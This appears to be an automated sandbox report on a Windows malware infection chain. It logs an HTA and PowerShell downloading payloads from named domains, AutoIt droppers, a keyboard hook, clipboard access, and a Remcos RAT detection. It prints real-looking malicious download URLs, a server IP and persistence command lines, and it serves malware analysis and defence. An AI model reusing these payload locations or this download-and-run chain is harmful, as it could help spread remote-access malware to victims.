Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B7D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

38_2_00B7D889

Source: global traffic	HTTP traffic detected: GET /c2.bat HTTP/1.1Accept: /Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: candwfarmsllc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /W2.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: candwfarmsllc.com
Source: global traffic	DNS traffic detected: DNS query: myguyapp.com
Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
Source: global traffic	DNS traffic detected: DNS query: me-work.com
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: msword.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: msword.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: msword.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: msword.exe.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: msword.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: msword.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: msword.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: msword.exe.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: msword.exe.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: msword.exe, 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000C.00000000.1815342236.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.10.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msword.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: msword.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: msword.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: msword.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Propose.com, 0000001C.00000000.1889679467.0000000000E85000.00000002.00000001.01000000.0000000F.sdmp, Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, LinkHub.com, 00000026.00000000.1915175704.0000000000BD5000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2013144133.0000000000BD5000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com.28.dr, Clinton.24.dr, Propose.com.17.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.10.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: mshta.exe, 00000000.00000002.1836002063.000000000A178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829402803.000000000A176000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1819440411.000000000A175000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://candwfarmsllc.com/
Source: mshta.exe, 00000000.00000003.1829604060.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833064513.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829604060.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834236290.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1832614125.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834159737.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834844401.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, c2.hta	String found in binary or memory: https://candwfarmsllc.com/c2.bat
Source: mshta.exe, 00000000.00000003.1829604060.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833064513.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1832614125.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834844401.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://candwfarmsllc.com/c2.batB4
Source: mshta.exe, 00000000.00000003.1829604060.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833064513.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1832614125.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834844401.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://candwfarmsllc.com/c2.batD7
Source: mshta.exe, 00000000.00000003.1833648920.000000000A067000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://candwfarmsllc.com/c2.batO
Source: mshta.exe, 00000000.00000003.1829604060.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833064513.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1832614125.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834844401.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://candwfarmsllc.com/c2.batr7
Source: mshta.exe, 00000000.00000003.1829402803.000000000A18A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1819440411.000000000A18A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1836002063.000000000A18A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000000.00000003.1819440411.000000000A1F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833621783.000000000A4B0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000C.00000002.1838350633.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000C.00000002.1838056908.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000C.00000002.1838553031.0000000002220000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1868648155.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1868526563.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1867332035.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1868720435.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1880640482.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1876400429.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1877656859.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1880498269.0000000002968000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1881003991.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.1885126519.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.1885344514.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.1941792062.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.1941847678.0000000003330000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1899903799.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1900327215.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.1902541710.00000000028D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf
Source: tasklist.exe, 00000013.00000002.1868526563.00000000028D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf-
Source: choice.exe, 0000001D.00000002.1941792062.00000000030A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf5i
Source: tasklist.exe, 00000015.00000002.1880640482.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1876400429.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1877656859.000000000299A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfn
Source: mshta.exe, 00000000.00000003.1819440411.000000000A1F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833621783.000000000A4B0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000C.00000002.1838350633.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000C.00000002.1838056908.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000C.00000002.1838553031.0000000002220000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1868648155.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1868526563.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1867332035.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1868720435.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1868074601.0000000002914000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1880640482.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1876400429.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1877656859.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1880498269.0000000002968000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1881003991.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.1885126519.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 00000018.00000002.1885344514.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.1941792062.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.1941847678.0000000003330000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1899903799.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1900327215.00000000033F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip
Source: choice.exe, 0000001D.00000002.1941792062.00000000030A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip7i
Source: tasklist.exe, 00000013.00000002.1868526563.00000000028D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipi
Source: tasklist.exe, 00000013.00000002.1868648155.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1867332035.000000000290B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipmp
Source: tasklist.exe, 00000015.00000002.1880498269.0000000002968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipsv
Source: tasklist.exe, 00000013.00000003.1867332035.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1868074601.0000000002914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://
Source: Propose.com, 0000001C.00000003.1900480853.0000000001435000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895761959.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895909544.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1900506196.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895883699.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895934970.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895857397.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895814046.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1896002009.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1900449402.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895791109.0000000001435000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf
Source: cmd.exe, 00000021.00000002.1902491554.0000000002740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.1902491554.000000000274B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP
Source: Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Propose.com.17.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49736 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 12_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

12_2_004050CD

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B7F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

38_2_00B7F7C7

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B7F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

38_2_00B7F55C

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 12_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

12_2_004044A5

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B99FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

38_2_00B99FD2

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match

File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B74763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

38_2_00B74763

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00B61B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

38_2_00B61B4D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		12_2_00403883
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B6F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		38_2_00B6F20D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\EquationsHighlights
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\OurProperty
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\ItemAnytime
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\ExpenditureBlood
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DentalSubtle

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_0040497C	12_2_0040497C
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_00406ED2	12_2_00406ED2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 12_2_004074BB	12_2_004074BB
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B28017	38_2_00B28017
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B0E1F0	38_2_00B0E1F0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B1E144	38_2_00B1E144
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B222A2	38_2_00B222A2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B022AD	38_2_00B022AD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B3A26E	38_2_00B3A26E
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B1C624	38_2_00B1C624
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B8C8A4	38_2_00B8C8A4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B3E87F	38_2_00B3E87F
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B36ADE	38_2_00B36ADE
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B72A05	38_2_00B72A05
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B68BFF	38_2_00B68BFF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B1CD7A	38_2_00B1CD7A
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B2CE10	38_2_00B2CE10
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B37159	38_2_00B37159
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B09240	38_2_00B09240
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B95311	38_2_00B95311
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B096E0	38_2_00B096E0
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B21704	38_2_00B21704
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B21A76	38_2_00B21A76
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B27B8B	38_2_00B27B8B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B09B60	38_2_00B09B60
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B27DBA	38_2_00B27DBA
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B21D20	38_2_00B21D20
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00B21FE7	38_2_00B21FE7

Source: Joe Sandbox View

